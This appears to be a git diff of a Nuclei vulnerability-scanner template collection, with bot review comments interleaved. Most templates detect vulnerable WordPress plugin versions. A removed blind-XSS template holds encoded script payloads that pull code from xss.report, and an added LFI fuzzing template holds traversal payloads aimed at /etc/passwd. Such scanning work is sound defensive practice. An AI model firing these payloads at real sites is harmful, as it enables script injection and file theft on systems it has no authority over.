cve,wordpress,wp-plugin,blogintroduction-wordpress-plugin,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/blogintroduction-wordpress-plugin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "blogintroduction-wordpress-plugin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.3.0') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7918.yaml b/nuclei-templates/CVE-2024/CVE-2024-7918.yaml new file mode 100644 index 0000000000..ced2912679 --- /dev/null 
+++ b/nuclei-templates/CVE-2024/CVE-2024-7918.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7918 + +info: + name: > + Pocket Widget <= 0.1.3 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Pocket Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 0.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c525344a-fb62-48c9-bfd2-a77f59da3470?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-7918 + metadata: + fofa-query: "wp-content/plugins/pocket-widget/" + google-query: inurl:"/wp-content/plugins/pocket-widget/" + shodan-query: 'vuln:CVE-2024-7918' + tags: cve,wordpress,wp-plugin,pocket-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pocket-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pocket-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.1.3') \ No newline at end of file 
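Review bot: `severity: low` and the trailing `low` tag disagree with the embedded `cvss-score: 4.4`, which sits in the CVSS v3.1 Medium band (4.0–6.9); the same mismatch appears in CVE-2024-8046 (L316, score 6.4) and CVE-2024-8199 (L321, score 4.3). Either align them (`severity: medium` and `tags: cve,wordpress,wp-plugin,pocket-widget,medium`) or add a comment stating that `severity` follows the upstream Wordfence rating rather than the CVSS band, so consumers filtering on severity know which scale they are getting. The description also says the issue only affects multi-site installations and installations where `unfiltered_html` is disabled, neither of which the readme.txt request can observe, so a hit from this template needs that precondition verified by hand before it is reported as a finding.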
diff --git a/nuclei-templates/CVE-2024/CVE-2024-8046.yaml b/nuclei-templates/CVE-2024/CVE-2024-8046.yaml new file mode 100644 index 0000000000..d195a54679 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-8046.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8046 + +info: + name: > + Logo Showcase Ultimate – Logo Carousel, Logo Slider & Logo Grid <= 1.4.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Logo Showcase Ultimate – Logo Carousel, Logo Slider & Logo Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/89525af0-105a-4d7d-93d1-af724a837e7a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8046 + metadata: + fofa-query: "wp-content/plugins/logo-showcase-ultimate/" + google-query: inurl:"/wp-content/plugins/logo-showcase-ultimate/" + shodan-query: 'vuln:CVE-2024-8046' + tags: cve,wordpress,wp-plugin,logo-showcase-ultimate,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/logo-showcase-ultimate/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "logo-showcase-ultimate" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.1') \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2024/CVE-2024-8054.yaml b/nuclei-templates/CVE-2024/CVE-2024-8054.yaml new file mode 100644 index 0000000000..86a83294b9 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-8054.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8054 + +info: + name: > + MM-Breaking News <= 0.7.9 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The MM-Breaking News plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.7.9. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/882639e3-615f-48df-9ddc-afbe0788d55f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8054 + metadata: + fofa-query: "wp-content/plugins/mm-breaking-news/" + google-query: inurl:"/wp-content/plugins/mm-breaking-news/" + shodan-query: 'vuln:CVE-2024-8054' + tags: cve,wordpress,wp-plugin,mm-breaking-news,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mm-breaking-news/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mm-breaking-news" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.7.9') \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2024/CVE-2024-8056.yaml b/nuclei-templates/CVE-2024/CVE-2024-8056.yaml new file mode 100644 index 0000000000..fe53462201 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-8056.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8056 + +info: + name: > + MM-Breaking News <= 0.7.9 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The MM-Breaking News plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_SERVER['REQUEST_URI'] in all versions up to, and including, 0.7.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b809ca97-ea82-4d56-a90a-e1ea9e7235ff?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8056 + metadata: + fofa-query: "wp-content/plugins/mm-breaking-news/" + google-query: inurl:"/wp-content/plugins/mm-breaking-news/" + shodan-query: 'vuln:CVE-2024-8056' + tags: cve,wordpress,wp-plugin,mm-breaking-news,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mm-breaking-news/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mm-breaking-news" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.7.9') \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2024/CVE-2024-8197.yaml b/nuclei-templates/CVE-2024/CVE-2024-8197.yaml new file mode 100644 index 0000000000..7e48fc65a0 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-8197.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8197 + +info: + name: > + Visual Sound <= 1.03 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + The Visual Sound plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.03. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/48d6d4c1-cc87-4c2c-9fbb-90af62f576aa?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8197 + metadata: + fofa-query: "wp-content/plugins/visual-sound/" + google-query: inurl:"/wp-content/plugins/visual-sound/" + shodan-query: 'vuln:CVE-2024-8197' + tags: cve,wordpress,wp-plugin,visual-sound,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/visual-sound/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visual-sound" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.03') \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2024/CVE-2024-8199.yaml b/nuclei-templates/CVE-2024/CVE-2024-8199.yaml new file mode 100644 index 0000000000..fc1a442f84 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-8199.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8199 + +info: + name: > + Reviews Feed – Add Testimonials and Customer Reviews From Google Reviews, Yelp, TripAdvisor, and More <= 1.1.2 - Missing Authorization to Authenticated (Subscriber+) Limited Settings Update + author: topscoder + severity: low + description: > + The Reviews Feed – Add Testimonials and Customer Reviews From Google Reviews, Yelp, TripAdvisor, and More plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_api_key' function in all versions up to, and including, 1.1.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update API Key options. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc3e89e5-2e7e-497e-b340-b787ebdf3711?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8199 + metadata: + fofa-query: "wp-content/plugins/reviews-feed/" + google-query: inurl:"/wp-content/plugins/reviews-feed/" + shodan-query: 'vuln:CVE-2024-8199' + tags: cve,wordpress,wp-plugin,reviews-feed,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/reviews-feed/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "reviews-feed" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-8200.yaml b/nuclei-templates/CVE-2024/CVE-2024-8200.yaml new file mode 100644 index 0000000000..900fd5baee --- /dev/null 
+++ b/nuclei-templates/CVE-2024/CVE-2024-8200.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8200 + +info: + name: > + Reviews Feed – Add Testimonials and Customer Reviews From Google Reviews, Yelp, TripAdvisor, and More <= 1.1.2 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Reviews Feed – Add Testimonials and Customer Reviews From Google Reviews, Yelp, TripAdvisor, and More plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the 'update_api_key' function. This makes it possible for unauthenticated attackers to update an API key via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d9e20f7-813c-4691-bce4-d0ff4774ae48?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8200 + metadata: + fofa-query: "wp-content/plugins/reviews-feed/" + google-query: inurl:"/wp-content/plugins/reviews-feed/" + shodan-query: 'vuln:CVE-2024-8200' + tags: cve,wordpress,wp-plugin,reviews-feed,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/reviews-feed/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "reviews-feed" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.2') \ No newline at end of file 
diff --git a/nuclei-templates/Other/0x71rex-blind-xss.yaml b/nuclei-templates/Other/0x71rex-blind-xss.yaml deleted file mode 100644 index 3f6bcba7bb..0000000000 --- a/nuclei-templates/Other/0x71rex-blind-xss.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: blind-xss - -info: - name: Blind XSS - author: shelled - severity: medium - description: This template will spray blind XSS payloads into URLs. Use xss.report to check if the payload fired. - tags: xss,blind,generic - -requests: - - raw: - - | - GET {{BaseURL}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: {{injection}} - - - payloads: - injection: - - '"><script src=//xss.report/s/shelled></script>' - - '"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL3NoZWxsZWQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>' - - 'javascript:eval("var a=document.createElement(\"script\");a.src=\"//xss.report/s/shelled\";document.body.appendChild(a)")' - - '"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL3NoZWxsZWQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>' - - '"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL3NoZWxsZWQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7>' - - '"><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://xss.report/s/shelled";parent.document.body.appendChild(a);</script>">' - - '<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//xss.report/s/shelled");a.send();</script>' - - '<script>$.getScript("//xss.report/s/shelled")</script>' - - 'var a=document.createElement("script");a.src="//xss.report/s/shelled";document.body.appendChild(a);' - - diff --git a/nuclei-templates/Other/0xlfifuzz1.yaml b/nuclei-templates/Other/0xlfifuzz1.yaml new file mode 100644 index 0000000000..a6d73b65f4 --- /dev/null 
+++ b/nuclei-templates/Other/0xlfifuzz1.yaml 
@@ -0,0 +1,38 @@ +id: linux-lfi-fuzzing +info: + name: Linux based LFI Fuzzing + author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley + severity: high + description: Fuzzes for /etc/passwd on passed URLs + tags: linux,lfi,fuzz +requests: + - method: GET + path: + - "{{BaseURL}}/?q=../../../etc/passwd&s=../../../etc/passwd&search=../../../etc/passwd&id=&action=../../../etc/passwd&keyword=../../../etc/passwd&query=../../../etc/passwd&page=../../../etc/passwd&keywords=../../../etc/passwd&url=../../../etc/passwd&view=../../../etc/passwd&cat=../../../etc/passwd&name=../../../etc/passwd&key=../../../etc/passwd&p=../../../etc/passwd" + - "{{BaseURL}}/?q=../../../etc/passwd%00&s=../../../etc/passwd%00&search=../../../etc/passwd%00&id=../../../etc/passwd%00&action=../../../etc/passwd%00&keyword=../../../etc/passwd%00&query=../../../etc/passwd%00&page=../../../etc/passwd%00&keywords=../../../etc/passwd%00&url=../../../etc/passwd%00&view=../../../etc/passwd%00&cat=../../../etc/passwd%00&name=../../../etc/passwd%00&key=../../../etc/passwd%00&p=../../../etc/passwd%00" + - "{{BaseURL}}/?q=%252e%252e%252fetc%252fpasswd&s=%252e%252e%252fetc%252fpasswd&search=%252e%252e%252fetc%252fpasswd&id=%252e%252e%252fetc%252fpasswd&action=%252e%252e%252fetc%252fpasswd&keyword=%252e%252e%252fetc%252fpasswd&query=%252e%252e%252fetc%252fpasswd&page=%252e%252e%252fetc%252fpasswd&keywords=%252e%252e%252fetc%252fpasswd&url=%252e%252e%252fetc%252fpasswd&view=%252e%252e%252fetc%252fpasswd&cat=%252e%252e%252fetc%252fpasswd&name=%252e%252e%252fetc%252fpasswd&key=%252e%252e%252fetc%252fpasswd&p=%252e%252e%252fetc%252fpasswd" + - 
"{{BaseURL}}/?q=%252e%252e%252fetc%252fpasswd%00&s=%252e%252e%252fetc%252fpasswd%00&search=%252e%252e%252fetc%252fpasswd%00&id=%252e%252e%252fetc%252fpasswd%00&action=%252e%252e%252fetc%252fpasswd%00&keyword=%252e%252e%252fetc%252fpasswd%00&query=%252e%252e%252fetc%252fpasswd%00&page=%252e%252e%252fetc%252fpasswd%00&keywords=%252e%252e%252fetc%252fpasswd%00&url=%252e%252e%252fetc%252fpasswd%00&view=%252e%252e%252fetc%252fpasswd%00&cat=%252e%252e%252fetc%252fpasswd%00&name=%252e%252e%252fetc%252fpasswd%00&key=%252e%252e%252fetc%252fpasswd%00&p=%252e%252e%252fetc%252fpasswd%00" + - "{{BaseURL}}/?q=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&s=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&search=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&id=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&action=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&keyword=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&query=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&keywords=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&url=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&view=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&cat=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&name=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&key=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd&p=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" + - "{{BaseURL}}/?q=....//....//etc/passwd&s=....//....//etc/passwd&search=....//....//etc/passwd&id=....//....//etc/passwd&action=....//....//etc/passwd&keyword=....//....//etc/passwd&query=....//....//etc/passwd&page=....//....//etc/passwd&keywords=....//....//etc/passwd&url=....//....//etc/passwd&view=....//....//etc/passwd&cat=....//....//etc/passwd&name=....//....//etc/passwd&key=....//....//etc/passwd&p=....//....//etc/passwd" + - 
"{{BaseURL}}/?q=..///////..////..//////etc/passwd&s=..///////..////..//////etc/passwd&search=..///////..////..//////etc/passwd&id=..///////..////..//////etc/passwd&action=..///////..////..//////etc/passwd&keyword=..///////..////..//////etc/passwd&query=..///////..////..//////etc/passwd&page=..///////..////..//////etc/passwd&keywords=..///////..////..//////etc/passwd&url=..///////..////..//////etc/passwd&view=..///////..////..//////etc/passwd&cat=..///////..////..//////etc/passwd&name=..///////..////..//////etc/passwd&key=..///////..////..//////etc/passwd&p=..///////..////..//////etc/passwd" + - "{{BaseURL}}/?q=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&s=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&search=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&id=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&action=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keyword=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&query=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keywords=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&url=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&view=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&cat=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&name=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&key=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&p=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd" + - 
"{{BaseURL}}/?q=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&s=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&search=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&id=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&action=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keyword=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&query=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keywords=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&url=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&view=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&cat=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&name=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&key=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&p=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd" + - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + - "{{BaseURL}}/?q=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/image?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/file?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - 
"{{BaseURL}}/file?name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/image?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/image?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/file?filename=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/file?name=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + - "{{BaseURL}}/?q=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" + stop-at-first-match: true + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/Other/3cx-management-console-2.yaml b/nuclei-templates/Other/3cx-management-console.yaml similarity index 100% rename from nuclei-templates/Other/3cx-management-console-2.yaml rename to nuclei-templates/Other/3cx-management-console.yaml diff --git a/nuclei-templates/Other/3g-wireless-gateway-3.yaml b/nuclei-templates/Other/3g-wireless-gateway-3.yaml deleted file mode 100644 index e53f7f09f4..0000000000 --- a/nuclei-templates/Other/3g-wireless-gateway-3.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: 3g-wireless-gateway -info: - name: 3G wireless gateway - author: pussycat0x - severity: info - reference: https://www.exploit-db.com/ghdb/7050 - tags: panel,router - -requests: - - method: GET - path: - - "{{BaseURL}}/htmlcode/html/indexdefault.asp" - - matchers-condition: and - matchers: - - type: word - words: - - "g_i3gState" - - "g_sysinfo_sim_state" - - "g_iUID" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/3g-wireless-gateway-6.yaml b/nuclei-templates/Other/3g-wireless-gateway-6.yaml new file mode 100644 index 0000000000..d8675d9ba9 --- /dev/null +++ b/nuclei-templates/Other/3g-wireless-gateway-6.yaml 
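Review bot: The new `0xlfifuzz1.yaml` uses the legacy top-level `requests:` key while the CVE templates added in this same commit use `http:`; the other new `Other/` templates on L330 and L331 have the same inconsistency, so one convention should be chosen for the repository. The only matcher is `regex: - "root:.*:0:0:"` on the body with no status condition, so any page that happens to render passwd-style sample text (documentation pages, honeypot responses) is reported at `severity: high`; adding `matchers-condition: and` with a `status: - 200` matcher would trim the obvious false positives. The `description: Fuzzes for /etc/passwd on passed URLs` also does not say that every path carries the probe in every candidate parameter at once, which anyone running this against a rate-limited or logged target would want stated up front.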
@@ -0,0 +1,32 @@
+id: 3g-wireless-gateway
+
+info:
+ name: 3G Wireless Gateway Detection
+ author: pussycat0x
+ severity: info
+ description: A 3G wireless gateway was detected.
+ reference:
+ - https://www.exploit-db.com/ghdb/7050
+ classification:
+ cwe-id: CWE-200
+ tags: panel,router
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/htmlcode/html/indexdefault.asp"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "g_i3gState"
+ - "g_sysinfo_sim_state"
+ - "g_iUID"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/14
diff --git a/nuclei-templates/CVE-2020/cve-2020-15227.yaml b/nuclei-templates/Other/44 - T9.yaml
similarity index 100%
rename from nuclei-templates/CVE-2020/cve-2020-15227.yaml
rename to nuclei-templates/Other/44 - T9.yaml
diff --git a/nuclei-templates/Other/53kf-fileRead.yaml b/nuclei-templates/Other/53kf-fileread.yaml
similarity index 100%
rename from nuclei-templates/Other/53kf-fileRead.yaml
rename to nuclei-templates/Other/53kf-fileread.yaml
diff --git a/nuclei-templates/Other/API-Linkfinder.yaml b/nuclei-templates/Other/API-Linkfinder.yaml
new file mode 100644
index 0000000000..bb882c92dd
--- /dev/null
+++ b/nuclei-templates/Other/API-Linkfinder.yaml
@@ -0,0 +1,19 @@
